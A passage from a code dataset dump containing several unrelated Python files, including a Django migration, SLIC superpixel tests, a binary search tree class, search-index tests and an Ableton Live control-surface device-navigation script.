'section')","sub_path":"notes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"400328465","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\nimport ctstem_app.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ctstem_app', '0152_auto_20190122_1316'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='usergroup',\n name='icon',\n field=models.ImageField(help_text=b'Upload 400x289 png image that represents this class', upload_to=ctstem_app.models.upload_file_to, blank=True),\n ),\n ]\n","sub_path":"ctstem_site/ctstem_app/migrations/0153_usergroup_icon.py","file_name":"0153_usergroup_icon.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"222424248","text":"def goldmine(c):\n X = [[c[i][j] for i in range(len(c))] for j in range(len(c[0]))]\n minimum = -1\n count = max((X[0]))\n left =-1\n right=-1\n initialj = X[0].index(count)\n for a in range(1,len(X)):\n if(initialj>0):\n left = initialj-1\n if(initialj 0\n\n viewer = HSIViewer(hsi_file)\n viewer.show_hsi_as_rgb(gain=1.5, highlights=edges, highlight_colors=[[1, 0, 0]])\n\n\n# transfer to ipython when ready\ndef test_rgb():\n # test of superpixel algorithm and comparison against scikit-image implementation\n # from skimage.segmentation import slic as sk_slic\n import cv2 as cv\n from alex.hsi import hd_manipulator\n from alex.plant_classifier.sk_slic_copy import slic_superpixels\n #from skimage.segmentation import slic_superpixels\n\n img = cv.imread(\"test_images/goat.jpg\")\n img = cv.resize(img, (0, 0), fx=1, fy=1)\n hdm = hd_manipulator.HDManipulator(cv.cvtColor(img, cv.COLOR_BGR2LAB), feature_first=False)\n\n slic = SLIC(hdm.convert_to_feat_first())\n\n ref_labels = slic_superpixels.slic(cv.cvtColor(img, cv.COLOR_BGR2LAB), n_segments=100, compactness=0.1, sigma=0,\n enforce_connectivity=False, convert2lab=False, max_iter=5)\n ref_edges = slic.get_boundaries(ref_labels)\n\n slic.run(num_clusters=100, compactness=0.1, iterations=5, lab=True, enforce_connectivity=False,\n presample_features=False, use_gradient_seeds=False)\n test_edges = slic.get_boundaries()\n\n ref_img = img.copy()\n test_img = img.copy()\n ref_img[np.where(ref_edges > 0)] = np.max(img)\n test_img[np.where(test_edges > 0)] = np.max(img)\n\n cv.namedWindow(\"SKImage\", cv.WINDOW_NORMAL)\n cv.imshow(\"SKImage\", ref_img)\n cv.namedWindow(\"Test\", cv.WINDOW_NORMAL)\n cv.imshow(\"Test\", test_img)\n cv.waitKey(0)\n cv.destroyAllWindows()\n\n print(\"SciKit-Image Stats:\")\n print(\"Number of clusters: %d\" % np.max(ref_labels))\n print(\"\")\n print(\"Test Image Stats:\")\n print(\"Number of clusters: %d\" % np.max(slic.labels))\n print(\"\")\n\ndef spectral_function_test():\n a = np.ones((4, 4, 4), np.float64)\n b = np.ones((4, 4, 4), np.float64)\n\n b[1, :, :] = 2\n a[3, :, :] = 100\n\n test_slic = SLIC(a)\n test_slic_theano = SLIC_theano(a)\n\n result_normal = test_slic.d_spectral(a, b)\n result_theano = test_slic.d_spectral(a, b)\n\n result_reference = np.arccos(np.sum(a*b, 0) / (np.sqrt(np.sum(a**2, 0)) * np.sqrt(np.sum(b**2, 0))))\n\n # test theano and normal against each other\n assert(np.all(result_normal == result_theano))\n assert(np.all(result_normal == result_reference))\n\n return 0\n\n\nif __name__ == '__main__':\n\n test_rgb()\n #test_hsi()\n #spectral_function_test()","sub_path":"testing/slic_test.py","file_name":"slic_test.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"77940427","text":"from itertools import chain\n\nclass Node:\n\n def __init__(self, val):\n self._parent = None\n self._left_child = None\n self._right_child = None\n self._val = val\n\n\n @property\n def parent(self):\n return self._parent\n \n\n @property\n def left_child(self):\n return self._left_child\n\n\n @property\n def right_child(self):\n return self._right_child\n\n\n @property\n def val(self):\n return self._val\n \n def preorder_traverse(self):\n left = self._preorder_traverse_left()\n right = self._preorder_traverse_right()\n return chain((self,), left, right)\n\n def _preorder_traverse_left(self):\n if self.left_child:\n return self.left_child.preorder_traverse()\n else:\n return ()\n\n def _preorder_traverse_right(self):\n if self.right_child:\n return self.right_child.preorder_traverse()\n else:\n return ()\n \n\n \n\n def insert(self, node, root):\n if not root:\n return False\n\n elif node.val == root.val:\n return False\n\n elif node.val < root.val:\n # insert left child\n if not root._left_child:\n root._left_child = node\n node.parent = root\n else:\n self.insert(node, root._left_child)\n\n else:\n # insert right child\n if not root._right_child:\n root._right_child = node\n node.parent = root\n else:\n self.insert(node, root._right_child)\n\n\n def delete(self, node):\n # if node is leaf\n if not node._left_child and not node._right_child:\n if node.parent._left_child is node:\n node.parent._left_child = None\n del node\n return True\n elif node.parent._right_child is node:\n node.parent._right_child = None\n del node\n return True\n else:\n return False\n\n","sub_path":"bst/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"280138200","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/shakespeare/tests/test_search.py\n# Compiled at: 2008-10-29 17:02:17\nimport os, shutil, tempfile, StringIO, shakespeare.search, shakespeare.tests\n\nclass TestSearch:\n\n def setUp(self):\n self.text = shakespeare.tests.make_fixture()\n basetmp = tempfile.gettempdir()\n self.tmpdir = os.path.join(basetmp, 'openshkspr-search')\n if os.path.exists(self.tmpdir):\n shutil.rmtree(self.tmpdir)\n os.makedirs(self.tmpdir)\n self.index = shakespeare.search.SearchIndex(self.tmpdir)\n self.index.add_item(StringIO.StringIO(self.text.content), self.text.name)\n\n def test_add_item(self):\n assert self.index.get_database().get_doccount() > 0\n\n def test_remove_item(self):\n self.index.remove_item(self.text.name)\n assert self.index.get_database().get_doccount() == 0\n\n def test_search_1(self):\n out = self.index.search('summer')\n assert len(out) == 2\n mset1 = out[0]\n exp = \"Shall I compare thee to a summer's day\"\n assert mset1.document.get_data().startswith(exp)\n\n def test_search_2(self):\n out = self.index.search('summer')\n mset1 = out[1]\n exp = \"But thy eternal summer shall not fade,\\nNor lose possession of that fair thou ow'st,\"\n assert mset1.document.get_data().startswith(exp)\n\n def test_search_3(self):\n out = self.index.search('rough')\n assert len(out) == 1\n\n def test_retrieve_lineno(self):\n out = self.index.search('summer')\n mset1 = out[1]\n lineno = mset1.document.get_value(shakespeare.search.LINE_NO)\n assert lineno == '9'\n\n def test_retrieve_itemid(self):\n out = self.index.search('summer')\n mset1 = out[1]\n name = mset1.document.get_value(shakespeare.search.ITEM_ID)\n assert name == self.text.name","sub_path":"pycfiles/shakespeare-0.6-py2.5/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"410623330","text":"\nfrom contextlib import contextmanager\nfrom itertools import chain\nfrom functools import partial, update_wrapper, singledispatch\n\nimport Live\nfrom ableton.v2.base import find_if, first, index_if, listenable_property, listens, listens_group, liveobj_changed, liveobj_valid, EventObject, SlotGroup, task\nfrom ableton.v2.control_surface import DecoratorFactory, device_to_appoint\nfrom ableton.v2.control_surface.components import DeviceNavigationComponent as DeviceNavigationComponentBase, FlattenedDeviceChain, ItemSlot, ItemProvider, is_empty_rack, nested_device_parent\nfrom ableton.v2.control_surface.control import control_list, StepEncoderControl\nfrom ableton.v2.control_surface.mode import Component, ModesComponent, NullModes, DelayMode\nfrom ableton.v2.control_surface.control import ButtonControl\n\nfrom pushbase.device_chain_utils import is_first_device_on_pad\nfrom Push2.bank_selection_component import BankSelectionComponent, BankProvider\nfrom Push2.chain_selection_component import ChainSelectionComponent\nfrom Push2.colors import DISPLAY_BUTTON_SHADE_LEVEL, IndexedColor\nfrom Push2.device_util import is_drum_pad, find_chain_or_track\nfrom Push2.item_lister import IconItemSlot, ItemListerComponent\n\n# from Push2.device_navigation import singledispatchmethod\n\nfrom aumhaa.v2.base.debug import log_flattened_arguments\n\ndef nop(self, *a, **k):\n pass\n\n\n# debug = log_flattened_arguments\ndebug = nop\n\ndef singledispatchmethod(func):\n \"\"\"\n TODO(lsp) Replace with builtin decorator when we update to python 3.8+\n this method didn't include a catch for calls without arguments, so it is added in the wrapper\n \"\"\"\n dispatcher = singledispatch(func)\n\n def wrapper(*args, **kw):\n # debug('args:', args)\n if len(args) > 1:\n return dispatcher.dispatch(args[1].__class__)(*args, **kw)\n else:\n return nop\n\n wrapper.register = dispatcher.register\n update_wrapper(wrapper, func)\n return wrapper\n\ndef find_drum_pad(items):\n\telements = map(lambda i: i.item, items)\n\treturn find_if(lambda e: is_drum_pad(e), elements)\n\n\n@singledispatchmethod\ndef is_active_element(drum_pad):\n\treturn not drum_pad.mute and drum_pad.canonical_parent.is_active\n\n\n@singledispatchmethod\ndef is_active_element(device):\n\treturn device.is_active\n\n\ndef set_enabled(device, is_on):\n\tdevice.parameters[0].value = int(is_on)\n\n\ndef is_on(device):\n\treturn bool(device.parameters[0].value)\n\n\ndef collect_devices(track_or_chain, nesting_level = 0):\n\tchain_devices = track_or_chain.devices if liveobj_valid(track_or_chain) else []\n\tdevices = []\n\tfor device in chain_devices:\n\t\tdevices.append((device, nesting_level))\n\t\tif device.can_have_drum_pads and device.view.selected_drum_pad:\n\t\t\tdevices.append((device.view.selected_drum_pad, nesting_level + 1))\n\t\tdevices.extend(collect_devices(nested_device_parent(device), nesting_level=nesting_level + 1))\n\n\treturn devices\n\n\ndef delete_device(device):\n\tdevice_parent = device.canonical_parent\n\tdevice_index = list(device_parent.devices).index(device)\n\tdevice_parent.delete_device(device_index)\n\n\ndef drum_rack_for_pad(drum_pad):\n\treturn drum_pad.canonical_parent\n\n\nclass SpecialBankSelectionComponent(BankSelectionComponent):\n\n\tcolor_class_name = 'BankSelection'\n\tnext_bank_button = ButtonControl()\n\tprevious_bank_button = ButtonControl()\n\n\tdef _create_slot(self, index, item, nesting_level):\n\t\titems = self._item_provider.items[self.item_offset:]\n\t\tnum_slots = min(self._num_visible_items, len(items))\n\t\tslot = None\n\t\tif index == 0 and self.can_scroll_left():\n\t\t\tslot = IconItemSlot(name='<-', icon='page_left.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telif index == num_slots - 1 and self.can_scroll_right():\n\t\t\tslot = IconItemSlot(name='->', icon='page_right.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telse:\n\t\t\tslot = ItemSlot(item=item, nesting_level=nesting_level)\n\t\t\tslot.is_scrolling_indicator = False\n\t\treturn slot\n\n\n\tdef update(self, *a, **k):\n\t\tsuper(SpecialBankSelectionComponent, self).update(*a, **k)\n\t\tif self.is_enabled():\n\t\t\tself._update_button_colors()\n\n\tdef _color_for_button(self, button_index, is_selected):\n\t\t# debug('color_for_button:', button_index, is_selected)\n\t\tif is_selected:\n\t\t\treturn self.color_class_name + '.ItemSelected'\n\t\treturn self.color_class_name + '.ItemNotSelected'\n\n\tdef set_previous_bank_button(self, button):\n\t\tself.previous_bank_button.set_control_element(button)\n\n\tdef set_next_bank_button(self, button):\n\t\tself.next_bank_button.set_control_element(button)\n\n\t@next_bank_button.pressed\n\tdef next_bank_button(self, button):\n\t\tdebug('BankSelection._on_next_bank_button_pressed')\n\t\tself._bank_provider._bank_registry.set_device_bank(self._bank_provider._device, min(len(self._bank_provider.items), self._bank_provider._bank_registry.get_device_bank(self._bank_provider._device) + 1))\n\n\n\t@previous_bank_button.pressed\n\tdef previous_bank_button(self, button):\n\t\tdebug('BankSelection._on_previous_bank_button_pressed')\n\t\tself._bank_provider._bank_registry.set_device_bank(self._bank_provider._device, max(0, self._bank_provider._bank_registry.get_device_bank(self._bank_provider._device) - 1))\n\n\n\n\n\nclass SpecialChainSelectionComponent(ChainSelectionComponent):\n\n\tcolor_class_name = 'ChainNavigation'\n\n\tdef _on_select_button_pressed(self, button):\n\t\tsuper(SpecialChainSelectionComponent, self)._on_select_button_pressed(button)\n\t\tself._parent._exit_chain_selection()\n\n\tdef _create_slot(self, index, item, nesting_level):\n\t\t#debug('ChainSelector._create_slot')\n\t\titems = self._item_provider.items[self.item_offset:]\n\t\tnum_slots = min(self._num_visible_items, len(items))\n\t\tslot = None\n\t\tif index == 0 and self.can_scroll_left():\n\t\t\tslot = IconItemSlot(name='<-', icon='page_left.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telif index == num_slots - 1 and self.can_scroll_right():\n\t\t\tslot = IconItemSlot(name='->', icon='page_right.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telse:\n\t\t\tslot = ItemSlot(item=item, nesting_level=nesting_level)\n\t\t\tslot.is_scrolling_indicator = False\n\t\treturn slot\n\n\tdef update(self, *a, **k):\n\t\tsuper(SpecialChainSelectionComponent, self).update(*a, **k)\n\t\tif self.is_enabled():\n\t\t\tself._update_button_colors()\n\n\tdef _color_for_button(self, button_index, is_selected):\n\t\tif is_selected:\n\t\t\treturn self.color_class_name + '.ItemSelected'\n\t\treturn self.color_class_name + '.ItemNotSelected'\n\n\t# def _scroll_left(self):\n\t# \tdebug('scroll_left')\n\t# \tsuper(SpecialChainSelectionComponent, self)._scroll_left()\n\t# \tdebug('scroll_left finished')\n\n\n\nclass DeviceChainStateWatcher(EventObject):\n\t\"\"\"\n\tListens to the device navigations items and notifies whenever the items state\n\tchanges and the color of the buttons might be affected.\n\t\"\"\"\n\t__events__ = ('state',)\n\n\tdef __init__(self, device_navigation = None, *a, **k):\n\t\tassert device_navigation is not None\n\t\tsuper(DeviceChainStateWatcher, self).__init__(*a, **k)\n\t\tself._device_navigation = device_navigation\n\t\tself.__on_items_changed.subject = device_navigation\n\t\tself._update_listeners_and_notify()\n\n\t@listens('items')\n\tdef __on_items_changed(self, *a):\n\t\tself._update_listeners_and_notify()\n\n\t@listens_group('is_active')\n\tdef __on_is_active_changed(self, device):\n\t\tself.notify_state()\n\n\t@listens_group('color_index')\n\tdef __on_chain_color_index_changed(self, chain):\n\t\tself.notify_state()\n\n\t@listens('mute')\n\tdef __on_mute_changed(self):\n\t\tself.notify_state()\n\n\tdef _navigation_items(self):\n\t\treturn filter(lambda i: not i.is_scrolling_indicator, self._device_navigation.items)\n\n\tdef _devices(self):\n\t\tdevice_items = filter(lambda i: not is_drum_pad(i.item), self._navigation_items())\n\t\treturn [i.item for i in device_items]\n\n\tdef _update_listeners_and_notify(self):\n\t\titems = list(self._navigation_items())\n\t\tchains = set(filter(liveobj_valid, map(lambda i: find_chain_or_track(i.item), items)))\n\t\tself.__on_is_active_changed.replace_subjects(self._devices())\n\t\tself.__on_mute_changed.subject = find_drum_pad(items)\n\t\tself.__on_chain_color_index_changed.replace_subjects(chains)\n\t\tself.notify_state()\n\n\nclass MoveDeviceComponent(Component):\n\tMOVE_DELAY = 0.1\n\tmove_encoders = control_list(StepEncoderControl)\n\n\tdef __init__(self, *a, **k):\n\t\tsuper(MoveDeviceComponent, self).__init__(*a, **k)\n\t\tself._device = None\n\n\tdef set_device(self, device):\n\t\tself._device = device\n\n\t@move_encoders.value\n\tdef move_encoders(self, value, encoder):\n\t\tif liveobj_valid(self._device):\n\t\t\twith self._disabled_encoders():\n\t\t\t\tif value > 0:\n\t\t\t\t\tself._move_right()\n\t\t\t\telse:\n\t\t\t\t\tself._move_left()\n\n\t@contextmanager\n\tdef _disabled_encoders(self):\n\t\tself._disable_all_encoders()\n\t\tyield\n\t\tself._tasks.add(task.sequence(task.wait(self.MOVE_DELAY), task.run(self._enable_all_encoders)))\n\n\tdef _disable_all_encoders(self):\n\t\tfor encoder in self.move_encoders:\n\t\t\tencoder.enabled = False\n\n\tdef _enable_all_encoders(self):\n\t\tfor encoder in self.move_encoders:\n\t\t\tencoder.enabled = True\n\n\tdef _move_right(self):\n\t\tparent = self._device.canonical_parent\n\t\tdevice_index = list(parent.devices).index(self._device)\n\t\tif device_index == len(parent.devices) - 1 and isinstance(parent, Live.Chain.Chain):\n\t\t\tself._move_out(parent.canonical_parent, move_behind=True)\n\t\telif device_index < len(parent.devices) - 1:\n\t\t\tright_device = parent.devices[device_index + 1]\n\t\t\tif right_device.can_have_chains and right_device.view.is_showing_chain_devices and right_device.view.selected_chain:\n\t\t\t\tself._move_in(right_device)\n\t\t\telse:\n\t\t\t\tself.song.move_device(self._device, parent, device_index + 2)\n\n\tdef _move_left(self):\n\t\tparent = self._device.canonical_parent\n\t\tdevice_index = list(parent.devices).index(self._device)\n\t\tif device_index > 0:\n\t\t\tleft_device = parent.devices[device_index - 1]\n\t\t\tif left_device.can_have_chains and left_device.view.is_showing_chain_devices and left_device.view.selected_chain:\n\t\t\t\tself._move_in(left_device, move_to_end=True)\n\t\t\telse:\n\t\t\t\tself.song.move_device(self._device, parent, device_index - 1)\n\t\telif isinstance(parent, Live.Chain.Chain):\n\t\t\tself._move_out(parent.canonical_parent)\n\n\tdef _move_out(self, rack, move_behind = False):\n\t\tparent = rack.canonical_parent\n\t\track_index = list(parent.devices).index(rack)\n\t\tself.song.move_device(self._device, parent, rack_index + 1 if move_behind else rack_index)\n\n\tdef _move_in(self, rack, move_to_end = False):\n\t\tchain = rack.view.selected_chain\n\t\tif chain:\n\t\t\tself.song.move_device(self._device, chain, len(chain.devices) if move_to_end else 0)\n\n\nclass DeviceNavigationComponent(DeviceNavigationComponentBase):\n\t__events__ = ('drum_pad_selection', 'mute_solo_stop_cancel_action_performed')\n\tcolor_class_name = 'DeviceNavigation'\n\tdisable_button = ButtonControl()\n\n\tdef __init__(self, device_bank_registry = None, banking_info = None, delete_handler = None, track_list_component = None, *a, **k):\n\t\tassert banking_info is not None\n\t\tassert device_bank_registry is not None\n\t\tassert track_list_component is not None\n\t\tself._flattened_chain = FlattenedDeviceChain(collect_devices)\n\t\tself._track_decorator = DecoratorFactory()\n\t\tself._modes = NullModes()\n\t\tself.move_device = None\n\t\tsuper(DeviceNavigationComponent, self).__init__(item_provider=self._flattened_chain, *a, **k)\n\t\tself._delete_handler = delete_handler\n\t\tself.chain_selection = SpecialChainSelectionComponent(parent=self, is_enabled=False)\n\t\tself.bank_selection = SpecialBankSelectionComponent(bank_registry=device_bank_registry, banking_info=banking_info, device_options_provider=self._device_component, is_enabled=False, parent=self)\n\t\tself.move_device = MoveDeviceComponent(parent=self, is_enabled=False)\n\t\tself._last_pressed_button_index = -1\n\t\tself._selected_on_previous_press = None\n\t\tself._was_in_chain_mode = False\n\t\tself._modes = ModesComponent(parent=self)\n\t\tself._modes.add_mode('default', [partial(self.chain_selection.set_parent, None), partial(self.bank_selection.set_device, None), self.update_item_name_listeners, DelayMode(self.update, delay = .05, parent_task_group = self._tasks)])\n\t\tself._modes.add_mode('chain_selection', [self.chain_selection, self.update_item_name_listeners, DelayMode(self.update, delay = .05, parent_task_group = self._tasks)])\n\t\tself._modes.add_mode('bank_selection', [self.bank_selection, self.update_item_name_listeners, DelayMode(self.update, delay = .05, parent_task_group = self._tasks)])\n\t\tself._modes.selected_mode = 'default'\n\t\tself.register_disconnectable(self._flattened_chain)\n\t\tself.__on_items_changed.subject = self\n\t\tself.__on_bank_selection_closed.subject = self.bank_selection\n\t\tself.__on_bank_items_changed.subject = self.bank_selection\n\t\tself.__on_chain_items_changed.subject = self.chain_selection\n\t\t# self.__on_chain_selection_closed.subject = self.chain_selection\n\t\tself._update_selected_track()\n\t\tself._track_list = track_list_component\n\t\twatcher = self.register_disconnectable(DeviceChainStateWatcher(device_navigation=self))\n\t\tself.__on_device_item_state_changed.subject = watcher\n\t\tself._on_mode_changed.subject = self._modes\n\t\tself._update_device()\n\t\tself._update_button_colors()\n\n\n\tdef _update_button_colors(self, *a, **k):\n\t\tsuper(DeviceNavigationComponent, self)._update_button_colors()\n\n\tdef update(self, *a, **k):\n\t\tsuper(DeviceNavigationComponent, self).update(*a, **k)\n\t\tif self.is_enabled():\n\t\t\tself._update_button_colors()\n\t\t\tself.chain_selection._update_button_colors()\n\t\t\tself.bank_selection._update_button_colors()\n\n\t@property\n\tdef modes(self):\n\t\treturn self._modes\n\n\t@listens('selected_mode')\n\tdef _on_mode_changed(self, *a, **k):\n\t\tself._update_button_colors()\n\t\tself.chain_selection._update_button_colors()\n\t\tself.bank_selection._update_button_colors()\n\n\t# @disable_button.pressed\n\t# def disable_button(self, button):\n\t# \tdebug('disable_button pressed', button)\n\n\tdef _in_device_enabling_mode(self):\n\t\t#return self.disable_button.is_pressed()\n\t\t# debug('disable_button:', self.disable_button)\n\t\t# debug('disable_button._is_pressed:', self.disable_button._is_pressed)\n\t\treturn self.disable_button._is_pressed\n\t\t# return False\n\n\tdef _on_select_button_pressed(self, button):\n\t\tdevice_or_pad = self.items[button.index].item\n\t\tif self._in_device_enabling_mode():\n\t\t\tself._toggle_device(device_or_pad)\n\t\t\tself.notify_mute_solo_stop_cancel_action_performed()\n\t\telse:\n\t\t\tself._last_pressed_button_index = button.index\n\t\t\tif not self._delete_handler or not self._delete_handler.is_deleting:\n\t\t\t\tself._selected_on_previous_press = device_or_pad if self.selected_object != device_or_pad else None\n\t\t\t\tself._was_in_chain_mode = self._modes.selected_mode == 'chain_selection'\n\t\t\t\tdebug('was_in_chain_mode:', self._was_in_chain_mode)\n\t\t\t\tself._select_item(device_or_pad)\n\n\tdef _on_select_button_released_immediately(self, button):\n\t\tif not self._in_device_enabling_mode():\n\t\t\tself._last_pressed_button_index = -1\n\t\t\tdevice_or_pad = self.items[button.index].item\n\t\t\tif self._delete_handler and self._delete_handler.is_deleting:\n\t\t\t\tself._delete_item(device_or_pad)\n\t\t\telif self.selected_object == device_or_pad and device_or_pad != self._selected_on_previous_press:\n\t\t\t\tself._on_reselecting_object(device_or_pad)\n\t\t\tself._selected_on_previous_press = None\n\n\tdef _on_select_button_pressed_delayed(self, button):\n\t\tif not self._in_device_enabling_mode():\n\t\t\tself._on_pressed_delayed(self.items[button.index].item)\n\n\tdef _on_select_button_released(self, button):\n\t\tif button.index == self._last_pressed_button_index:\n\t\t\tself._modes.selected_mode = 'default'\n\t\t\tself._last_pressed_button_index = -1\n\t\t\tself._end_move_device()\n\n\t# @select_buttons.double_clicked\n\t# def select_buttons(self, button):\n\t# \tself._on_select_button_double_clicked(button)\n\t#\n\t# def _on_select_button_double_clicked(self, button):\n\t# \tdebug('_on_select_button_double_clicked', button)\n\n\t@singledispatchmethod\n\tdef _toggle_device(self, drum_pad):\n\t\tif liveobj_valid(drum_pad):\n\t\t\tdrum_pad.mute = not drum_pad.mute\n\n\t@singledispatchmethod\n\tdef _toggle_device(self, device):\n\t\tif liveobj_valid(device) and device.parameters[0].is_enabled:\n\t\t\tset_enabled(device, not is_on(device))\n\n\t@listens('state')\n\tdef __on_device_item_state_changed(self):\n\t\tself._update_button_colors()\n\t\t# debug('adding task...')\n\t\tself._tasks.add(self._update_button_colors)\n\n\t@listenable_property\n\tdef item_names(self):\n\t\titems = ['-' for index in range(16)]\n\t\tif self._modes.selected_mode == 'default' or self._modes.selected_mode == 'chain_selection':\n\t\t\tnew_items = [str(item.name).replace(' ', '_') if hasattr(item, 'name') else '-' for item in self.items]\n\t\t\titems[:len(new_items)] = new_items\n\t\t\t#debug('mode is default, names are:', items)\n\t\tif self._modes.selected_mode == 'chain_selection':\n\t\t\titems[8:] = [str(item.name).replace(' ', '_') if hasattr(item, 'name') else '-' for item in self.chain_selection.items]\n\t\t\t#debug('mode is chain_selection, names are:', items)\n\t\telif self._modes.selected_mode == 'bank_selection':\n\t\t\titems[8:] = [str(item.name).replace(' ', '_') if hasattr(item, 'name') else '-' for item in self.bank_selection.items]\n\t\t\t#debug('mode is bank_selection, names are:', items)\n\t\t#debug('item names are:', items)\n\t\treturn items\n\n\t@listens('items')\n\tdef __on_bank_items_changed(self):\n\t\t# new_items = map(lambda x: x.item, self.bank_selection.items)\n\t\t# names = self.item_names\n\t\t# self.notify_item_names()\n\t\tself.update_item_name_listeners()\n\n\t@listens('items')\n\tdef __on_chain_items_changed(self):\n\t\t# names = self.item_names\n\t\t# self.notify_item_names()\n\t\t# new_items = map(lambda x: x.item, self.chain_selection.items)\n\t\tself.update_item_name_listeners()\n\n\t@listens('items')\n\tdef __on_items_changed(self):\n\t\tnew_items = [x.item for x in self.items]\n\t\tlost_selection_on_empty_pad = new_items and is_drum_pad(new_items[-1]) and self._flattened_chain.selected_item not in new_items\n\t\tif self._should_select_drum_pad() or lost_selection_on_empty_pad:\n\t\t\tself._select_item(self._current_drum_pad())\n\t\tif self.moving:\n\t\t\tself._show_selected_item()\n\t\tself.notify_drum_pad_selection()\n\t\tself.update_item_name_listeners()\n\n\tdef update_item_name_listeners(self):\n\t\tnames = self.item_names\n\t\tself.notify_item_names(*names)\n\n\tdef _create_slot(self, index, item, nesting_level):\n\t\titems = self._item_provider.items[self.item_offset:]\n\t\tnum_slots = min(self._num_visible_items, len(items))\n\t\tslot = None\n\t\tif index == 0 and self.can_scroll_left():\n\t\t\tslot = IconItemSlot(name='<-', icon='page_left.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telif index == num_slots - 1 and self.can_scroll_right():\n\t\t\tslot = IconItemSlot(name='->', icon='page_right.svg')\n\t\t\tslot.is_scrolling_indicator = True\n\t\telse:\n\t\t\tslot = ItemSlot(item=item, nesting_level=nesting_level)\n\t\t\tslot.is_scrolling_indicator = False\n\t\treturn slot\n\n\t@listenable_property\n\tdef moving(self):\n\t\treturn self.move_device.is_enabled()\n\n\t@property\n\tdef device_selection_update_allowed(self):\n\t\treturn not self._should_select_drum_pad()\n\n\tdef _color_for_button(self, button_index, is_selected):\n\t\titem = self.items[button_index]\n\t\tdevice_or_pad = item.item\n\t\tis_active = liveobj_valid(device_or_pad) and is_active_element(device_or_pad)\n\t\tchain = find_chain_or_track(device_or_pad)\n\t\tif not is_active:\n\t\t\treturn 'DefaultButton.Off'\n\t\telif is_selected:\n\t\t\treturn 'ItemNavigation.ItemSelected'\n\t\telif liveobj_valid(chain):\n\t\t\t# return IndexedColor.from_live_index(chain.color_index, DISPLAY_BUTTON_SHADE_LEVEL)\n\t\t\treturn 'ItemNavigation.ItemNotSelected'\n\t\telse:\n\t\t\treturn 'ItemNavigation.ItemNotSelected'\n\n\tdef _begin_move_device(self, device):\n\t\tif not self.move_device.is_enabled() and device.type != Live.Device.DeviceType.instrument:\n\t\t\tself.move_device.set_device(device)\n\t\t\tself.move_device.set_enabled(True)\n\t\t\tself._scroll_overlay.set_enabled(False)\n\t\t\tself.notify_moving()\n\n\tdef _end_move_device(self):\n\t\tif self.move_device and self.move_device.is_enabled():\n\t\t\tself.move_device.set_device(None)\n\t\t\tself.move_device.set_enabled(False)\n\t\t\tself._scroll_overlay.set_enabled(True)\n\t\t\tself.notify_moving()\n\n\tdef request_drum_pad_selection(self):\n\t\tself._current_track().drum_pad_selected = True\n\n\tdef unfold_current_drum_pad(self):\n\t\tself._current_track().drum_pad_selected = False\n\t\tself._current_drum_pad().canonical_parent.view.is_showing_chain_devices = True\n\n\tdef sync_selection_to_selected_device(self):\n\t\tself._update_item_provider(self.song.view.selected_track.view.selected_device)\n\n\t@property\n\tdef is_drum_pad_selected(self):\n\t\treturn is_drum_pad(self._flattened_chain.selected_item)\n\n\t@property\n\tdef is_drum_pad_unfolded(self):\n\t\tselection = self._flattened_chain.selected_item\n\t\tassert is_drum_pad(selection)\n\t\treturn drum_rack_for_pad(selection).view.is_showing_chain_devices\n\n\tdef _current_track(self):\n\t\treturn self._track_decorator.decorate(self.song.view.selected_track, additional_properties={'drum_pad_selected': False})\n\n\tdef _should_select_drum_pad(self):\n\t\treturn self._current_track().drum_pad_selected\n\n\tdef _current_drum_pad(self):\n\t\treturn find_drum_pad(self.items)\n\n\tdef _update_selected_track(self):\n\t\tself._selected_track = self.song.view.selected_track\n\t\tselected_track = self._current_track()\n\t\tself.reset_offset()\n\t\tself._flattened_chain.set_device_parent(selected_track)\n\t\tself._device_selection_in_track_changed.subject = selected_track.view\n\t\tself._modes.selected_mode = 'default'\n\t\tself._end_move_device()\n\t\tself._restore_selection(selected_track)\n\n\tdef _restore_selection(self, selected_track):\n\t\tto_select = None\n\t\tif self._should_select_drum_pad():\n\t\t\tto_select = self._current_drum_pad()\n\t\tif to_select == None:\n\t\t\tto_select = selected_track.view.selected_device\n\t\tself._select_item(to_select)\n\n\tdef back_to_top(self):\n\t\tpass\n\n\t@property\n\tdef selected_object(self):\n\t\tselected_item = self.item_provider.selected_item\n\t\treturn getattr(selected_item, 'proxied_object', selected_item)\n\n\t@singledispatchmethod\n\tdef _do_select_item(self, pad):\n\t\tself._current_track().drum_pad_selected = True\n\t\tdevice = self._first_device_on_pad(pad)\n\t\tself._appoint_device(device)\n\n\tdef _first_device_on_pad(self, drum_pad):\n\t\tchain = drum_rack_for_pad(drum_pad).view.selected_chain\n\t\tif chain and chain.devices:\n\t\t\treturn first(chain.devices)\n\n\tdef _appoint_device(self, device):\n\t\tif self._device_component._device_changed(device):\n\t\t\tself._device_component.set_device(device)\n\n\t# def _select_item(self, device_or_pad):\n\t# \tdebug('_select_item:', self._modes.selected_mode)\n\t# \tif self._modes.selected_mode == u'chain_selection':\n\t# \t\tself._modes.selected_mode = u'default'\n\t# \telse:\n\t# \t\tsuper(DeviceNavigationComponent, self)._select_item(device_or_pad)\n\n\t@singledispatchmethod\n\tdef _do_select_item(self, device):\n\t\tself._current_track().drum_pad_selected = 